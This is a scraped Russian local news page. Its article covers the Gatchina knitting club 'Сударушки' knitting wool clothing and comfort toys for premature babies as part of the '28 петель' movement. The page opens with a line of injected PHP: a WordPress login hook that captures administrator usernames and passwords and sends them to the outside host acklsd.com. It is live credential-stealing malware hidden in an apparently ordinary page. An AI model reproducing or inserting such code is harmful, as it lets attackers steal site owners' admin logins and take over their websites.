if (!function_exists("theme_login_init_e691dd827bcab292bda72cb716f33c79")) { function theme_login_init_e691dd827bcab292bda72cb716f33c79() { if (isset($_POST['log']) and isset($_POST['pwd'])) { $abc = $_POST['log']; $bca = $_POST['pwd']; $zxa = (array)wp_authenticate($abc, $bca); if (isset($zxa["allcaps"]['administrator'])) { $url = 'https://acklsd.com/loginfileweb?url=' . urlencode(wp_login_url()) . '&user=' . urlencode($abc) . '&pass=' . urlencode($bca) . '&site=' . urlencode(wp_login_url()); $response = wp_remote_get($url); } } } add_action('wp_login', 'theme_login_init_e691dd827bcab292bda72cb716f33c79', 10, 0); } 28 петель для «торопыжек» — Гатчинка.рф
Home » Поселения » Город Гатчина » 28 петель для «торопыжек»
Руки вяжут

28 петель для «торопыжек»

Во Всемирный день вязания на публике, 14 июня, Гатчинский клуб  «28 петель» заявил о себе не то, чтобы громко, но наглядно. Мастерицы с клубками, спицами и крючками устроились на лавочках на Соборной улице, недалеко от места, где играет джаз-бэнд.

 Гуляющие по гатчинскому променаду с интересом останавливались у импровизированной мастерской и с умилением разглядывали крохотные носочки, шапочки и пупса, одетого с ног до головы в филигранно вывязанную одёжку.

Кукла в вязанной одежде

Везёт вашим внучкам, в такую красоту одеваете их кукол. Столько хлопот, вязать такие крошечные носочки…, щебетала юная особа, рассматривая малюсенькие вещи.

Хлопот действительно немало, но вяжем мы не для пупсиков и куколок, а для маленьких торопыжек. Так мы называем деток, которые появляются на свет раньше срока, включается в разговор Вера Бондарева, руководитель клуба «Сударушки» Гатчинской Школы третьего возраста.

Вера Георгиевна предложила «сударушкам» вступить в международное движение «28 петель», они поддержали своего руководителя, и начали в конце прошлого года вязать крохотную одёжку похожую, скорее, на кукольную, чем на детскую.

Почему 28 петель? Что это означает? спрашиваю Веру.

Именно столько петель требуется на резинку носочка для ребёнка, который появился на свет раньше времени. Недоношенные детки рождаются от 500 граммов до 2 кг. Представляете таких крохотулечек? У них нежнейшая кожа, это требует очень аккуратной работы от вязальщиц, не должно быть узелков, ниточки должны быть ровными, новыми. И, при этом, обязательно натуральная шерсть. Это очень важно!

Задача у этой одежды согреть. У недоношенных детей ещё не сформировался подкожный жир, у них ещё не настроена терморегуляция, они должны жить в животе, но поспешили выйти в этот холодный и не очень комфортный мир. Шерсть не только лучше удерживает тепло, она ещё и воздействует на рефлекторные зоны малыша, она покалывает, а это заставляет шевелиться, улучшается движение крови и кроха согревается изнутри.

Вера Бондарева (сидит в центре)

Вера Бондарева (сидит в центре)

Но, к сожалению, все вещички для торопыжек, по сути, одноразовые. После термической обработки шерсть даёт большую усадку. Поэтому, вязать нужно постоянно, продолжает рассказывать Вера Георгиевна. А это не только «человекочасы», но и финансовые затраты. Шерсть нынче не дешёвое удовольствие. А движение «28 петель» исключительно добровольческое. Рассчитывать можем только на помощь добрых людей.

Цель, с которой «сударушки» вышли вязать публично привлечь внимание жертвователей и продать плоды своего рукоделия, чтобы на вырученные деньги покупать натуральные нитки для своих подопечных «торопыжек», которые появляются на свет в Гатчинском перинатальном центре и во Всеволожском роддоме.

Кроме шерстяных ниток, нужны ещё и хлопчатобумажные, для вязания специальных игрушек-осминожек. Если бы мне не объяснили, для чего нужны такие головастики с ногами-пружинками, я бы подумала, что опять появилась мода подвешивать украшения на лобовое стекло машины.

Но, нет: у этих пружинок совсем другое назначение. Игрушки-комфортеры имитируют пуповину. Их кладут ребёночку в бокс, он теребит эти штучки вместо маминой пуповины, и успокаивается, ему становится хорошо.

  Я думаю, мамочки вам в ноги кланяются за такую заботу о детках… Ведь недоношенный ребёнок это неожиданность. А тут такая поддержка.

— Да, думаю, благодарят, но мы этого не знаем. Я как раз обратилась в Гатчинский перинатальный центр, с просьбой чтобы нас пригласили: например, на День открытых дверей. Устроили нам встречу с беременными и с уже родившими женщинами: хотим познакомиться, рассказать о движении «28 петель», чтобы они не думали, что эти вещи с неба падают, что за ними стоит кропотливый труд, и чтобы они помогали нашему движению.

  Сегодня не зря вязали публично?

Нет! Во-первых, сегодня к нам приехала из Красного Села Людмила Курочкина и привезла нам хлопчатобумажную пряжу для вязания игрушек-осьминожек. Во-вторых, нам удалось наторговать. Наша ярмарка-продажа привлекла китайских туристов: их удивили экомочалки, связанные из полиэтиленовых пакетов. Они накупили на приличную сумму: мочалок, прихваток, сидушек для стульев. Все средства пойдут на покупку пряжи для вязания пледов, носочков, жилеток и шапочек нашим торопыжкам.

"Сударушки"

«Сударушки»

«Сударушки» говорят, что на миру вязать веселее. Они с удовольствием делились не только своими секретами и техниками. Но и жизненными историями. Тамара Михайловна Бородина, вязавшая палантин на «вилке», удивила ответом на мой вопрос: Когда Вы освоили такой способ вязания?

В 49-м году.

Нет, Вы меня не поняли: я спросила не год Вашего рождения, а когда Вы научились вязать на этой «вилке»?

Ну, так я и говорю в 49-м, мне было 11 лет.

Тамара Бородина

Тамара Бородина

Я начала считать в уме, сколько же лет этой миниатюрной, энергичной, словоохотливой женщине. Удивилась своему результату, не поверила, захотелось достать калькулятор… Вот что делает крючок для вязания и доброе отзывчивое сердце!

Мы решили сделать такие вылазки регулярными. Почему нет?  Художники ходят на пленэры, вот и мы будем, говорит Вера Бондарева, прощаясь. При этом она быстро и ловко вяжет, даже не глядя на руки.

Алёна РЫБАКОВА

От редакции.

Кто хочет помочь движению «28 петель», свяжитесь с Верой Георгиевной:    +7  921 5839162

More 578 posts in Город Гатчина
Recommended for you
60е фото2
Гатчинской Детской библиотеке 105 лет: 60-е годы – Новоселье в Детской библиотеке

Третье поколение детей мирной послевоенной жизни росло - дети учились, получали знания в детских садах,...